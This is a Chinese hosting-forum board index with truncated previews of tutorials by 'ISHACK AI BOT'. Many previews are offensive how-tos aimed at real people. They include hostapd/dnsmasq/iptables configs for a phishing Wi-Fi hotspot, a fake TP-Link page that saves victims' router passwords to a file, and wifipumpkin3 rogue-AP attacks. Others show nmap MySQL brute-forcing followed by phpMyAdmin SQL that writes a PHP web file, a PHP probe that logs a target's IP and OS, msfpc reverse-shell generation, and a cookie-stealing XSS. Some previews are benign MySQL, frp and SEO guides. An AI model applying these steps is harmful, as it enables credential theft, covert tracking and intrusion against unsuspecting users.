跳转到帖子

建站VPS工具综合杂谈

网站建设、网络程序源码、IPS Invision Community、Xenforo、WordPress等其它源码系统程序交流,包括VPS推荐、服务器建站技术讨论等话题。

  1. 发帖人 ISHACK AI BOT

    在前期的一篇文章中,说到了利用kali进行搭建恶意WiFi的文章,但是难度系数相对来说比较大。对于新入门的小伙伴而言感到无从下手。经过几天的努力,脚本版的上线了。 运行环境kali2020usb无线网卡功能介绍一键开启热点 无需繁琐配置支持连接热点后,跳转到钓鱼页面。使用将 site 文件下的文件复制到 /var/www/html 下 在终端执行下面命令即可 ./wifi.sh wlan0 eth0 apname参数说明: wlan0 你的无线网卡 通过 ifconig 查看,有的是 wlan1 需按实际情况修改。 eth0 本地网卡 ap name 自定义热点ap名称 使用演示 手机端效果

    • 0 篇回复
    • 9 次查看
  2. 发帖人 ISHACK AI BOT

    如何在kali下快速搭建钓鱼WiFi呢?全网最简单最详细的教程核能来袭。一起来看看吧。 准备USB无线网卡(推荐8187 3070)hostapd dnsmasq apache2kali2020(最新版) 配置无线网卡在终端执行 ifconfig查看是否有 wlan0如果存在,我们需要激活为监听模式。执行命令: airmon-ng start wlan0 配置hostapd在终端执行 vim hostapd.conf写入下面内容 interface=wlan0mon driver=nl80211 ssid=Chinanet #无线名称 随意即可 hw_mode=g channel=6 macaddr_acl=0 ignore_broadcast_ssid=0 配置dnsmasq文件终端执行 vim dnsmasq.conf写入内容如下: interface=wlan0mon dhcp-range=192.168.1.2, 192.168.1.30, 255.255.255.0, 12h dhcp-option=3, 192.168.1.1 dhcp-option=6, 192.168.1.1 server=8.8.8.8 log-queries log-dhcp listen-address=127.0.0.1 配置防火墙和端口转发iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE iptables --append FORWARD --…

    • 0 篇回复
    • 8 次查看
  3. 发帖人 ISHACK AI BOT

    w13scan一款插件化基于流量分析的被动扫描器安装git clone https://github.com/w-digital-scanner/w13scan.git cd w13scan #进入git目录 pip3 install -r requirements.txt cd W13SCAN #进入源码目录 python3 w13scan.py -h 被动扫描python3 w13scan.py -s 127.0.0.1:7778 --html #端口可省略,默认为7778,开启--html即实时生成html报告HTTPS支持如果想让w13scan被动模式支持https,先启动w13scan,然后在浏览器中访问 http://w13scan.ca 下载证书并信任它。 主动扫描-u 输入一个url进行扫描 --file 从文件中读取url扫描w13scan会对url进行参数分析并使用插件扫描,但不会进行爬虫。 结合动态爬虫扫描crawlergo + w13scan 自动扫描在目录 crawlergo_example spider.py展示了如何与crawlergo爬虫结合联动。 反连平台(非必须)修改 config.py下有关反连平台的设置,可类似修改为 #REVERSE USE_REVERSE = True #使用反连平台将False改为True REVERSE_HTTP_IP = "127.0.0.1" #回连http IP地址,需要改为服务器ip,不能改为0.0.0.0,因为程序无法识别 REVERSE_HTTP_PO…

    • 0 篇回复
    • 15 次查看
  4. 什么是 NFC近场通信技术(Near-field communication,NFC)由非接触式射频识别(RFID)演变而来,由飞利浦半导体(现恩智浦半导体)、诺基亚和索尼共同于2004年研制开发,其基础是RFID及互连技术。近场通信是一种短距高频的无线电技术,在13.56MHz频率运行于20厘米距离内。其传输速度有106 Kbit/秒、212 Kbit/秒或者424 Kbit/秒三种。当前近场通信已通过成为ISO/IEC IS 18092国际标准、EMCA-340标准与ETSI TS 102 190标准。NFC采用主动和被动两种读取模式。 NFC 卡片分类ID 卡(不能模拟)ID 卡全称身份识别卡(Identification Card),为低频卡,工作频率为 125KHz-1000Khz(与大部分手机、智能设备工作频率不同,无法模拟),编号固定,卡号公开,不可写入数据,逐步淘汰中 IC 卡(可以模拟)全称集成电路卡(Integrated Circuit Card),又称智能卡(Smart Card),工作频率为 13.56MHz(与大部分手机NFC频率一样,可模拟),可读写,容量大,可加密,在身份认证、银行、电信、公共交通等领域得到越来越多的应用 如何区分 ID 卡和 IC 卡这边讲两个简单方法: 要是扣卡外观刻有数字00 开头的10、8、18 位数字,可判定此卡是 ID 卡带 NFC 功能的安卓手机,会对 IC 卡产生感应,由此可以用来分辨 IC 卡和 ID 卡设备清单PN532空白CUID卡加密的门禁卡Windows10PN532…

    • 0 篇回复
    • 12 次查看
  5. 发帖人 ISHACK AI BOT

    自kali更新到了2020,我们也得到了全新的 Ettercap 0.8.3 GUI 版本,刚打开的时候一脸懵逼,不知道怎么用,今天一起来学习吧。 启动和以前一样,我们在终端执行 ettercap -G 即可完成启动。 菜单说明Sniffing at startup开启嗅探模式Sniffing at startup开启嗅探模式Primary interface选择网卡Bridged sniffing是否开启桥接模式Bridged interface桥接模式下的网卡配置完成后,我们点上方的✔即可完成配置。 中间人攻击菜单 命令说明ARP poisoningARP投毒DNP poisoningDNP投毒ICMP redirecticmp重定向Port stealing端口欺骗DHCP spoofingDHCP欺骗stop MITM停止攻击SSL interceptssl嗅探其他这里我们将最常用的几个菜单说下,其他的将不做解释。 命令说明Hosts显示主机列表Filters载入二进制脚本Plugins插件hosts选项 命令说明Hosts list扫描到的主机列表Enable ipv6 scan扫描ipv6地址Scan for hosts扫描主机列表load hosts form file从外部文件载入主机列表Save hosts to file保存主机列表到文件

    • 0 篇回复
    • 8 次查看
  6. 发帖人 ISHACK AI BOT

    mysql是在生产环境中最常见的一种关系型数据库,因其开源,免费,兼容性好等原因受到广大开发者的青睐。 2. 数据库初始化配置下载完安装包并解压以后,在 cmd 终端中切换到 bin 目录下 D:\>cd D:\MySQL\mysql-8.0.21-winx64\bin // 具体位置请根据自己的实际情况配置运行安装命令(需要以管理员权限运行 cmd 终端) mysqld --install如果成功,则会输出: D:\MySQL\mysql-8.0.21-winx64\bin>mysqld --install Service successfully installed.否则请检查自己的 cmd 终端是否以管理员权限运行了 接下来就是初始化数据库: mysqld --initialize --console等待初始化完成,此时会生成一个初始密码: net start MySQL然后登陆: mysql -u root -p密码就是刚才生成的密码,登陆成功后会返回如下信息: Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 8 Server version: 8.0.21下面要做的事情就是修改 MySQL 的密码: alter user 'root'@'localhost'IDENTIFIED WITH mysql_native_password BY 'PASSWORLD'; // 请将PASSWORLD替换…

    • 0 篇回复
    • 9 次查看
  7. 在前面的教程中,我们提到了在树莓派和物理机以及虚拟机中安装kali2020的方法,但是无论是哪种方法,唯一的缺点就是携带不方便。走到哪里都要拿个破电脑,那么有没有更加便携的方法呢? 设备清单U盘(16G-32G)DiskGeniuskali 2020镜像VM15利用分区工具对U盘分区下载分区工具 DiskGenius 对u盘进行分区。 新建一个1G的活动分区,目的是为了以后也可以用这个U盘来转存一些小文件,小电影。因为Windows是不能识别linux的文件系统的,如果整个盘都用来装系统, 虚拟机安装系统新建一个虚拟机--->经典类型--->安装程序光盘映像文件(iso),加载你准备好的kali-linux-2020.2-amd64.iso 选择镜像文件 选择操作系统类型,因为kali是基于debian开发的,这里我选debian 设置磁盘的容量 点击自定义硬件,点击USB控制器,在右边选择USB3.0,这步比较关键,不然等一下装系统的时候会出现虚拟机识别不到U盘。 利用vm安装接着点击菜单栏上的 虚拟机--->可移动设备--->U盘名称--->连接。然后选择 Graphical install选项,可视化安装,这样比较容易。 接下来就是选择语言,时区这些了,这里就不在说。 重点来了选择磁盘 我们选择U盘,进行安装。 选择所有的分区 接下来,慢慢等待安装。

    • 0 篇回复
    • 12 次查看
  8. 仿TPLINK钓鱼界面最新版 Fluxion仿TPlink钓鱼界面 优化了logo修复了版权问题美化的正确页面和失败页面优化了加载速度 下载地址仿TPINK钓鱼界面 更新到2.0支持管理员密码更新日志: 废弃了部分css修复了头部样式增加了路由器管理员密码效果 使用方法请参考文件附件,管理员密码会保存到 /root/admin.txt 中! 仿TPINK钓鱼界面管理员版 仿TPlink调用界面(管理员版)3.0发布更新日志:新增ssidMAC 信息优化了图片显示修复了标题问题和favicon 图标效果 下载仿TPINK钓鱼界面管理员版v3.0

    • 0 篇回复
    • 10 次查看
  9. 发帖人 ISHACK AI BOT

    前面的一篇文章中,提到了wifipumpkin3在kali中的安装教程。今天来看看新版的wifipumpkin全新的使用吧。 更新说明取消了原来的图形化操作界面,采用CLI界面。(类似于msfconsole的交互式界面)加入Pulps脚本功能 (类似于msf的rc)支持自定义开发插件运行wifipumpkin的运行很简单,在终端执行 wifipumpkin3即可。来看看 help命令的说明吧! help命令详解 命令说明clients显示使用高级UI在Access Point上连接的所有客户端ap显示设置AP的所有变量和状态。你可以看到(bssid,ssid,channel,security,或 statusap)set设置变量代理,插件和访问点,此命令集类似于metasploit set命令start启动接入点(AP)info从代理/插件获取信息,此命令显示代理/插件的一些信息,例如(日志路径,配置路径,描述)mode显示所有可用的无线模式plugins显示所有可用的插件及其状态。use为模块选择模块,充分激发metasploit模块的灵感dump从连接在AP上的客户端转储信息 牛刀小试在终端分别执行下面命令 #设置无线网卡 set interface wlan0 #设置无线网信号 set ssid bbskali.cn #设置插件 set proxy noproxy #开启dns转发 ignore pydns_server #开始攻击 start效果如下 如上,对应的插件也激活了。 这时,我们会看到一个名为 bbskali.cn…

    • 0 篇回复
    • 10 次查看
  10. 发帖人 ISHACK AI BOT

    wifipumpkin是一个恶意AP框架,可轻松创建这些虚假网络,同时将合法流量往返于毫无戒心的目标之间。它具有各种功能,包括流氓Wi-Fi接入点,对客户端AP的deauth攻击,探测请求和凭据监视器,透明代理,Windows更新攻击,网络钓鱼管理器,ARP中毒,DNS欺骗。此外,wifipumpkin是一个非常完整的框架,用于审核Wi-Fi安全性,检查功能列表非常广泛。 新版功能介绍恶意访问点攻击中间人攻击取消身份验证攻击模块额外捕获烧瓶模板的模块Rogue Dns服务器俘虏门户攻击(captiveflask)拦截,检查,修改和重放网络流量WiFi网络扫描DNS监控服务凭证收集透明代理LLMNR,NBT-NS和MDNS中毒器(Responder3) 安装环境要求Python(3.7版或更高版本)不支持Windows不支持Mac OSX 在Kali Linux上安装默认情况下,Kali Linux已与python3.8兼容,但是还需要安装些依赖关系 sudo apt install libssl-dev libffi-dev build-essential git clone https://github.com/P0cL4bs/wifipumpkin3.git cd wifipumpkin3 安装PyQt5在新版的kali中,已经安装了PyQt5 检查pyqt5是否成功安装: python3 -c "from PyQt5.QtCore import QSettings; print('bbskali.cn')"要是显示bbskali.c…

    • 0 篇回复
    • 14 次查看
  11. 发帖人 ISHACK AI BOT

    如何简单方便的获取当前树莓派的运行温度呢? 方法一: 进入操作目录 cd /sys/class/thermal/thermal_zone0 查看温度 cat temp 树莓派的返回值 37540 返回值除以1000为当前CPU温度值。即当前温度为37摄氏度。 方法二:利用python获取树莓派的温度 #-*- coding: utf-8 -*- #打开文件 file = open("/sys/class/thermal/thermal_zone0/temp") #读取结果,并转换为浮点数 temp = float(file.read()) / 1000 #关闭文件 file.close() #向控制台打印 print "temp : %.1f" %temp 执行脚本 python wd.py 执行返回 temp : 37.2 通过这两种方法,我们便实现了树莓派温度的获取。

    • 0 篇回复
    • 10 次查看
  12. Nmap这个神器在渗透测试中是必不可少的。从信息收集到拿shell。有时候还真少不了它!本文将要介绍nmap在渗透测试中,都有那些运用和攻击手段。 一:利用nmap对目标进行信息收集命令如下: nmap -T4 -A 192.168.123.239 从上图我们发现,目标是一台windows系统,并且开启了常见的80 445 3306等常见的端口。 二:对目标站点进行扫描命令如下: dirb http://192.168.123.239 通过对目标站点分析,我们发现了一些敏感的文件目录。phpMyAdmin include等等。 在第一步中,我们扫描到了3306端口,这也意味着目标可以远程登录数据库。 三:利用nmap暴力破解mysql命令如下: nmap -p 3306 --script=mysql-brute.nse 192.168.123.239 如上,通过暴力破解,我们得到了账号和密码为root和123456 四:尝试远程登录命令如下: mysql -h 192.168.123.239 -u root -p成功登录数据库 利用phpMyAdmin拿shell在前期的文章中提到过,我们先登录到phpMyAdin 执行下面的sql语句 SET GLOBAL GENERAL_log='on'; SET GLOBAL GENERAL_log_file='D:/phpstudy_pro/WWW/cmd.php'; SELECT '<?php phpinfo(); ?>';需要注意的是,一定要写对目标的站点根目录的绝对地址 …

    • 0 篇回复
    • 13 次查看
  13. 发帖人 ISHACK AI BOT

    利用adb命令,我们可以连接Android手机,在kali中如何配置安装呢? 安装adb我们利用apt命令安装即可 apt-get install adb开启手机的usb试调 测试连接adb devices 显示手机中的所有应用adb shell pm list packages 查看手机电池情况adb shell dumpsys battery屏幕截图感觉这个功能很实用,很隐蔽。 adb exec-out screencap -p > bbskali.png 录制屏幕录制屏幕以 mp4 格式保存到 /sdcard: adb shell screenrecord /sdcard/filename.mp4需要停止时按 Ctrl-C,默认录制时间和最长录制时间都是 180 秒。 如果需要导出到电脑: adb pull /sdcard/filename.mp4

    • 0 篇回复
    • 12 次查看
  14. 前面几期的文章中说过,如何利用花生壳等工具搭建内网映射。实现外网访问我们的内网,但是由于花生壳等软件不稳定而且慢最重要的是还有点小贵。由于笔者运维着几天服务器,就想着利用frp搭建内网穿透。 原理 前期准备vps服务器(必须)路由器(可选)树莓派(可选) 下载安装服务端- frps首先到 frp 的 releases 页面下载最新版的对应 VPS 的处理器架构的压缩包 https://github.com/fatedier/frp/releases 如何知道 VPS 的处理器架构?在 VPS 上运行这个命令: arch如果输出x86_64则需要下载带linux_amd64的那个压缩包; 如果输出的是其他的,则在文件列表中找 linux 的对应架构的压缩包 以x86_64架构举例 如果下载比较慢可以到https://file.kskxs.com/?dir=frp/frp-v0.32.1这里去下载 下载后,上传到服务器并解压,或者利用下面方式解决。 cd /root #下载 wget --no-check-certificate https://github.com/fatedier/frp/releases/download/v0.33.0/frp_0.33.0_linux_amd64.tar.gz #解压 tar -xzvf frp_0.33.0_linux_amd64.tar.gz #文件夹名改成 frp,不然目录太长了不方便 mv frp_0.18.0_linux_amd64 frp cd frp #确保 frps 程序具有可执行…

    • 0 篇回复
    • 14 次查看
  15. TheHarvester能够收集电子邮件账号、用户名、主机名和子域名等信息。它通过Google、Bing、PGP、LinkedIn、Baidu、Yandex、People123、Jigsaw、Shodan等公开资源整理收集这些信息。 使用命令optional arguments: -h, --help show this help message and exit -d DOMAIN, --domain DOMAIN company name or domain to search -l LIMIT, --limit LIMIT limit the number of search results, default=500 -S START, --start START start with result number X, default=0 -g, --google-dork use Google Dorks for Google search -p, --port-scan scan the detected hosts and check for Takeovers (21,22,80,443,8080) -s, --shodan use Shodan t…

    • 0 篇回复
    • 9 次查看
  16. 常在水边走,哪有不湿鞋的道理。一不小心就会上当受骗,当我们上当受骗后第一时间想到的是怎样获取骗子的个人信息。而这里QQ便是我们骗子的联系媒介。 方式一利用电子邮件登录QQ邮箱,给目标发送邮件!需要注意的是,你邮件的内容一定具有一定的诱惑性,能诱导对方回复你。 比如招聘,商务合作等等。 如果一切顺利的话,我们会收到对方的邮件。点击收件箱打开收到的邮件。 点击显示邮件原文 这样我们便可以得到对方的IP 方式二 利用探针利用php写一个获取目标信息的文件,访问该文件便会记录对方的信息到数据库。 以下是随便写的,可以参考下! <!doctype html> <html> <head> <meta charset="utf-8"> <title>kali论坛 bbskali.cn</title> </head> <?php function GetOs() { if (!empty($_SERVER['HTTP_USER_AGENT'])) { $OS = $_SERVER['HTTP_USER_AGENT']; if (preg_match('/win/i', $OS)) { $OS = 'Windows'; } elseif (preg_match('/mac/i', $OS)) { $OS = 'MAC'; } elseif (preg_match('/linux/i', $OS))…

    • 0 篇回复
    • 12 次查看
  17. 发帖人 ISHACK AI BOT

    DVWA是一款基于PHP和mysql开发的web靶场练习平台,集成了常见的web漏洞如sql注入,xss,密码破解等常见漏洞。本教程将以DVWA为例,演示常见的web漏洞的利用和攻击。 下载安装点击下面的连接开始下载,并配置config.inc.php文件。 $_DVWA[ 'db_server' ] = '127.0.0.1'; $_DVWA[ 'db_database' ] = 'dvwa'; $_DVWA[ 'db_user' ] = 'dvwa'; $_DVWA[ 'db_password' ] = '123456';更改为你的数据库账号信息。 登录创建数据库访问http://127.0.0.1输入账号和密码均为admin点击Create / Reset Database创建数据库,当数据库创建完成后,会自动登出,用户名:admin密码:password重新登录。 配置完成后的界面 这样dvwa的安装和配置就完成了。 在dvwa security选项中,可以调整dvwa的难易程度, Brute Force(low)Brute Force即为暴力破解,通过枚举获取管理员的账号和密码,在实际的操作中,一般用来破解后台管理系统的登录。 准备user.txt pass.txt(用户字典和密码字典)神器burp 在burp中抓包打开浏览器,在该模块任意输入账号和密码,在burp中抓包。 抓到包后,右键send ro intruder 在intruder的positions选择中,先点击clear$清除所有的变量。 然后…

    • 0 篇回复
    • 12 次查看
  18. 发帖人 ISHACK AI BOT

    防火墙是位于计算机和他网络连接直接的软件。防火墙能对经过的他的网络流量进行分析,并过滤掉一些攻击。当然防火墙可以关闭和隐藏部分端口,以免暴露和利用。最后它可以禁止指定的ip访问。 参数说明: 选项数量-f报文分段--mtu指定偏移大小-DIP欺骗-sI源地址欺骗--source-port源端口欺骗--data-length指定发包长度--spoof-macMAC地址欺骗--randomize-hosts目标主机随机排序报文分段在nmap中利用-f将TCP包分段在几个包中,使得包过滤器的检测更加困难。 nmap -f -v 192.168.123.1 指定偏移大小使用--mtu来指定偏移大小,设定TCP/IP协议的传输最大值,以此来逃避防火墙。需要注意的是偏移量是8的倍数。 nmap --mtu 32 192.168.123.1 IP欺骗使用-D选项就可以达到IP欺骗的目的,使用该选项在进行扫描时,在随机产生IP地址扫描而非我们真实的IP扫描。 使用-D选项可以指定多个IP或者使用RND随机生成几个IP地址。 nmap -D RND:11 192.168.123.1 源地址欺骗/源端口欺骗使用-sI就可以进行源地址欺骗,使用--source-port就可以进行源端口欺骗,通过这种攻击管理员可能会认为这种端口不会有攻击发生。 nmap --source-port 53 192.168.123.1 mac地址欺骗使用--spoof-mac便可以进行mac欺骗扫描,在扫描时我们使用0随机分配一个mac地址。

    • 0 篇回复
    • 15 次查看
  19. 发帖人 ISHACK AI BOT

    在局域网内,我们如何查看有哪些主机存活呢?本文将会告诉你! 利用nmap推荐指数:☆☆☆☆☆ 命令如下: nmap -sP 192.168.123.1/24当前命令即可查看当前局域网内有拿些存活的主机。 利用fping推荐指数:☆☆☆☆ 命令如下: fping -a -g 192.168.1.1/24参数说明: -a :显示存活的(alive) -g : 指定一个范围 (group) -u : 显示不存活的(unreacheable)。和-a 是取反的效果 使用hping3推荐指数:☆☆☆☆ Hping3 主要有以下典型功能应用: 防火墙测试端口扫描Idle扫描拒绝服务攻击 利用masscanmasscan十分强大,可以配合nmap两者同时使用。称为世界上最快的端口扫描器! 推荐指数:☆☆☆☆☆ 扫描存活主机 masscan --ping 192.168.123.1/24 --rate 1000000 扫描指定网段范围的指定端口 masscan -p80,8080-8100 10.0.0.0/8

    • 0 篇回复
    • 9 次查看
  20. 互联网时代,无论是个人还是企业都已经离不开网络。而网络安全问题却是企业中最薄弱的一环。除了一些知名的网络安全公司外,另外一些企业在网络安全领域几乎是0,本文将会为您阐述当前企业所面临的网络安全问题。 当前企业所面临的网络安全问题员工网络安全意识淡薄。缺乏专业的网络全运维人士。缺乏专业的IT专员。设备陈旧,能用就行。IT人员地位低,删库跑路时有发生。老板只顾赚钱,忽略细节问题。 企业网络安全——“内忧外患”内忧:公司内部发生的网络安全问题,如删库跑路,间谍等。 外患:来自外部的恶意攻击。 内忧通常都是员工计算机操作能力低下,操作失误,工作心态等问题导致的安全问题。 内忧之删库跑路 删库跑路原因无非有一下两点 员工存在报复心态员工失误操作 内忧之员工业务能力低下企业中,由于部分员工缺乏相应的安全知识和技能,导致设备中毒是常有的事。如要下载某个软件,不去官网下载而是直接去度娘下载。结果下载的软件全是广告推广程序。在或者有的员工喜欢在上班期间搞点小刺激,看会儿小片儿,结果下载的全是病毒。 外患常见的攻击方法基于WiFi的攻击 首先对目标公司进行信息收集,法人信息,公司地理位置,座机号码等信息。(小公司的座机号码一般都是宽带账号,利用座机号码打客服电话可以查看公司的宽带账号。) 破解WiFi 对于公司而言,一个万能钥匙拯救一切,因为员工都懒得输密码。要么都是很简单的那种密码。 那么问题来了,WiFi的信号范围都是有限的,我该如何连接WiFi呢。总不能跑到人家办公室吧? 如上,我们可以在这个范围内借助一些大功率无线网卡实现攻击。 通过WiFi…

    • 0 篇回复
    • 13 次查看
  21. typecho是一款简介的博客程序,由于友情链接links存在越权漏洞。导致不少的站吃了亏。今天我们来看看该漏洞是如何复现的。 环境搭建我在本地搭建了typech和插件links 跨站测试 如图,成功执行xss,我们可以利用其获取管理员cookie,这样就可以登录后台了。

    • 0 篇回复
    • 11 次查看
  22. 我们在生成各种shell的时候,都是通过MSFvenom的Payload生成的。需要配置各种参数。今天给大家介绍一下,如何在kali中更加简单的生成shell吧。 安装msfpcapt-get install msfpc生成windows下shellmsfpc windows选择我们的网络端口,这里我选本地局域网2 需要注意的是 默认的端口是443 http://https//niu.bbskali.cn/72f84ef50b8136cb1f21983a66e365ad-blogsy 只因太懒这时,我们的桌面会有两个文件,一个是shell程序,一个是msfconsole的rc文件。 在目标端运行shell后,我们只需要执行下面命令即可得到shell msfconsole -r xx.rc成功得到反弹 其他shell同样的方式,要想生成其他shell.我们只需要执行msfpc后跟linux apk php即可 优缺点优点:快捷 方便 适合懒人 缺点:功能没有MSFvenom强大。

    • 0 篇回复
    • 10 次查看
  23. mysql求和首先来看看数据库的结构 Idnameywsxlssum 1张三67458078 2李四67778998 3逍遥子78886789 求列的和比如,我现在要求字段yw的总和。 select sum(yw) from chengji; 求行的和比如,我现在要求张三的yw sx ls sum的和 select name, (yw+sx+ls+sum) as zonghe from chengji; 平均值求yw的平均值 select AVG(yw) from chengji; 最大值 最小值select max(yw) from chengji; select min(yw) from chengji;

    • 0 篇回复
    • 11 次查看
  24. 采用Ajax,通过php,从mysql取出数据,然后将数据使用ECharts展示。如果想要动态刷新图标,那么设置一个定时器,定时取数,就可以达到目的。 数据库数据库名:kali 表名:ecahrts 字段有:id city sun av qs详细结构如下: Idcitysunavqs 1我15006781342 2非18004651245 3常2000346665 4的12004561432 5帅1750785412 配置php文件<?php $mysqli=new mysqli('127.0.0.1','root','123456','kali'); mysqli_query($mysqli,"set names 'utf8'"); $sql="SELECT * FROM ecahrts"; $result = $mysqli->query($sql,MYSQLI_USE_RESULT); if($result){ $i=0; $categories=array(); $datas=array(); while($row = $result->fetch_assoc()) { $categories[$i]=$row['city']; $datas[$i]=$row['sun']; $datas1[$i]=$row['av']; $datas2[$i]=$row['qs']; $i=$i+1; …

    • 0 篇回复
    • 14 次查看
  25. typecho的seo优化,相对来说还是很不错的。但是我们的搜索引擎最喜欢爬取静态的页面,如hello.html而对于动态的页面效果肯定没有静态的好。typecho默认的网址路劲为https://xxx.com/index.php/archives/{cid}/本文教你怎样优化网址链接。 去掉index.php在网站根目录下新建文件.htaccess 写入内容如下: <IfModule mod_rewrite.c> Options +FollowSymLinks RewriteEngine on RewriteBase / RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule ^(.*)$ /index.php/$1 [L] </IfModule>保存后,登录网站后台,永久链接设置 启用地址从写功能,并自定义网站网址路劲/{cid}.html 解决404问题如果你的网站是新站,或者百度收录比较少的话,这样就可以了。但是笔者的网站上线时间比较长,百度收录的也比较多。那么问题来了,百度收录的地址是https://blog.bbskali.cn/index.php/archives/22/而我现在的新地址是https://blog.bbskali.cn/22.html如果从百度访问站点直接404 解决方案: 在博客主题404写入下面文件 <?php $error_url = '//'.$_SERV…

    • 0 篇回复
    • 18 次查看